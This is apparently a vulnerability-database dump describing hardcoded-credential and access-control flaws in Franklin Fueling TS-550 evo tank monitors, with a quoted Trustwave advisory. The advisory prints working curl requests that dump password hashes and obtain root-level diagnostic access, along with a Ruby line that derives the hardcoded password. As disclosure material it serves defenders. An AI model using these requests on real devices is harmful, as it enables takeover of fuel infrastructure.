            "url": "http://www.franklinfueling.com/)"
          },
          {
            "trust": 0.1,
            "url": "http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7248"
          },
          {
            "trust": 0.1,
            "url": "https://www.trustwave.com"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67249"
          },
          {
            "db": "BID",
            "id": "64996"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "db": "PACKETSTORM",
            "id": "124873"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7247"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-67249"
          },
          {
            "db": "BID",
            "id": "64996"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "db": "PACKETSTORM",
            "id": "124873"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7247"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-26T00:00:00",
            "db": "VULHUB",
            "id": "VHN-67249"
          },
          {
            "date": "2014-01-03T00:00:00",
            "db": "BID",
            "id": "64996"
          },
          {
            "date": "2014-01-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "date": "2014-01-21T23:03:33",
            "db": "PACKETSTORM",
            "id": "124873"
          },
          {
            "date": "2014-01-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          },
          {
            "date": "2014-01-26T01:55:09.877000",
            "db": "NVD",
            "id": "CVE-2013-7247"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-67249"
          },
          {
            "date": "2015-03-19T08:08:00",
            "db": "BID",
            "id": "64996"
          },
          {
            "date": "2014-01-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "date": "2014-01-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-7247"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Franklin Fueling Systems TS-550 evo Of firmware  cgi-bin/tsaws.cgi Vulnerability in which important information is obtained",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "permissions and access control",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201401-0296

    Vulnerability from variot - Updated: 2025-04-11 22:53

    Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use the hardcoded roleDiag password to gain root privileges and take full control of the device. Affects versions prior to 2.4.0.

    Product description: A fuel management system with a programmable interface used for inventory and delivery management.

    Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200

    As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application.

    Request

    curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi

    Response

    Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798

    The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby:

    $ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC."

    Request

    curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi

    Response (note the ROLE)

    The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin's, they can completely compromise the device. Trustwave SpiderLabs have not verified the fix that the vendor released (see Revision History below).

    Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published

    References 1. http://www.franklinfueling.com/evo/

    About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

    About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

    Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.


    This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0296",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "franklinfueling",
            "version": "2.3.1.7492"
          },
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "franklinfueling",
            "version": "2.0.0.6833"
          },
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "franklinfueling",
            "version": null
          },
          {
            "model": "ts-550 evo",
            "scope": null,
            "trust": 0.8,
            "vendor": "franklin fueling",
            "version": null
          },
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "franklin fueling",
            "version": "2.0.0.6833"
          },
          {
            "model": "ts-550 evo",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "franklin fueling",
            "version": "2.4.0"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7248"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:franklinfueling:ts-550_evo",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:franklinfueling:ts-550_evo_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nate Drier and Matt Jakubowski of TrustWave SpiderLabs",
        "sources": [
          {
            "db": "BID",
            "id": "65041"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2013-7248",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-7248",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-67250",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-7248",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-7248",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201401-538",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-67250",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67250"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7248"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability. \nAttackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device. \nFranklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use this to gain root privileges and take full control of the device.  Affects prior to version\n2.4.0\n\nProduct description:\nA fuel management system with a programmable interface used for inventory\nand delivery management. \n\nFinding 1: Insufficient Access Control\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7247\nCWE: CWE-200\n\nAs the Guest user (the lowest privilege), a user can post the\ncmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the\nusernames and password hashes (in DES format) for all users of the\napplication. Once dumped, they can be cracked and used to access\nauthenticated portions of the application. 
\n\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebGetConfiguration\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-02-19T22:09:22Z\" TIME_STAMP_LOCAL=\"2013-02-19T17:09:22\" KEY=\"11111111\" ROLE=\"roleGuest\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebGetConfiguration\"\u003e\u003cCONFIGURATION\u003e\n    \u003cDEBUGGING LOGGING_ENABLED=\"false\" LOGGING_PATH=\"/tmp\"/\u003e\n    \u003cROLE_LIST\u003e\n        \u003cROLE NAME=\"roleAdmin\" PASSWORD=\"YrKMc2T2BuGvQ\"/\u003e\n        \u003cROLE NAME=\"roleUser\" PASSWORD=\"2wd2DlEKUPTr2\"/\u003e\n        \u003cROLE NAME=\"roleGuest\" PASSWORD=\"YXFCsq2GXFQV2\"/\u003e\n    \u003c/ROLE_LIST\u003e\n\u003c/CONFIGURATION\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nFinding 2: Hardcoded Technician Credentials\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7248\nCWE: CWE-798\n\nThe three primary users on the TS550 are roleGuest, roleUser, and\nroleAdmin.  Another user exists with additional access named roleDiag. This\nuser can access extra portions of the application such as the command line\ninterface, enable and disable SSH, as well as run SQL commands all from the\nweb interface.  The CLI interface includes the ability to run engineering\nand manufacturing commands.  The password for roleDiag is the key (a value\nreturned with every POST request to tsaws.cgi) DES encrypted.  
This can be\ndone in Ruby:\n\n\n$ irb\n1.9.3p374 :001 \u003e \"11111111\".crypt(\"aa\")\n =\u003e \"aaDTlAa1fGGC.\"\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST PASSWORD=\"aaDTlAa1fGGC.\"\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebCheckRole\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response (note the ROLE)\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-03-04T16:53:01Z\" TIME_STAMP_LOCAL=\"2013-03-04T11:53:01\" KEY=\"11111111\" ROLE=\"roleDiag\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebCheckRole\"\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nThe password can then be used to run various roleDiag commands. An attacker\ncan enable SSH, and since root\u0027s password is the same as roleAdmin, they\ncan completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. \n\n\nRevision History:\n04/16/13 - Vulnerability disclosed to vendor\n12/18/13 - Fix released on a limited basis by vendor\n01/03/14 - Advisory published\n\nReferences\n1. http://www.franklinfueling.com/evo/\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. 
Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n________________________________\n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-7248"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "db": "BID",
            "id": "65041"
          },
          {
            "db": "VULHUB",
            "id": "VHN-67250"
          },
          {
            "db": "PACKETSTORM",
            "id": "124873"
          }
        ],
        "trust": 2.07
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-67250",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67250"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-7248",
            "trust": 2.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "65041",
            "trust": 0.4
          },
          {
            "db": "PACKETSTORM",
            "id": "124873",
            "trust": 0.2
          },
          {
            "db": "EXPLOIT-DB",
            "id": "31180",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-67250",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67250"
          },
          {
            "db": "BID",
            "id": "65041"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "db": "PACKETSTORM",
            "id": "124873"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7248"
          }
        ]
      },
      "id": "VAR-201401-0296",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67250"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-11T22:53:07.912000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "TS-550 evo",
            "trust": 0.8,
            "url": "http://www.franklinfueling.com/americas/en/ts-550-evo"
          },
          {
            "title": "ts550evo-2327608",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=47720"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-255",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67250"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7248"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://www.trustwave.com/spiderlabs/advisories/twsl2014-001.txt"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7248"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7248"
          },
          {
            "trust": 0.3,
            "url": "http://www.franklinfueling.com/americas/en"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7247"
          },
          {
            "trust": 0.1,
            "url": "http://www.franklinfueling.com/evo/"
          },
          {
            "trust": 0.1,
            "url": "https://www.trustwave.com/spiderlabs"
          },
          {
            "trust": 0.1,
            "url": "http://www.franklinfueling.com/)"
          },
          {
            "trust": 0.1,
            "url": "http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7248"
          },
          {
            "trust": 0.1,
            "url": "https://www.trustwave.com"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67250"
          },
          {
            "db": "BID",
            "id": "65041"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "db": "PACKETSTORM",
            "id": "124873"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7248"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-67250"
          },
          {
            "db": "BID",
            "id": "65041"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "db": "PACKETSTORM",
            "id": "124873"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7248"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-26T00:00:00",
            "db": "VULHUB",
            "id": "VHN-67250"
          },
          {
            "date": "2014-01-03T00:00:00",
            "db": "BID",
            "id": "65041"
          },
          {
            "date": "2014-01-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "date": "2014-01-21T23:03:33",
            "db": "PACKETSTORM",
            "id": "124873"
          },
          {
            "date": "2014-01-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          },
          {
            "date": "2014-01-26T01:55:09.890000",
            "db": "NVD",
            "id": "CVE-2013-7248"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-67250"
          },
          {
            "date": "2015-03-19T08:34:00",
            "db": "BID",
            "id": "65041"
          },
          {
            "date": "2014-01-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          },
          {
            "date": "2014-01-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-7248"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Franklin Fueling Systems TS-550 evo firmware root privilege vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005929"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-538"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2022-44039 (GCVE-0-2022-44039)

    Vulnerability from nvd – Published: 2022-12-05 00:00 – Updated: 2025-04-24 13:55
    Summary
    Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). An attacker can overwrite system files such as [system.conf] and [passwd]. This occurs because of the insecure use of the "fopen" system function with the mode "wb", which overwrites the file if it already exists. Overwriting files such as passwd allows an attacker to escalate privileges by planting a backdoor user with root privileges or by changing the root password.
    SSVC
    Exploitation: poc Automatable: yes Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • n/a
    • CWE-863 - Incorrect Authorization
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
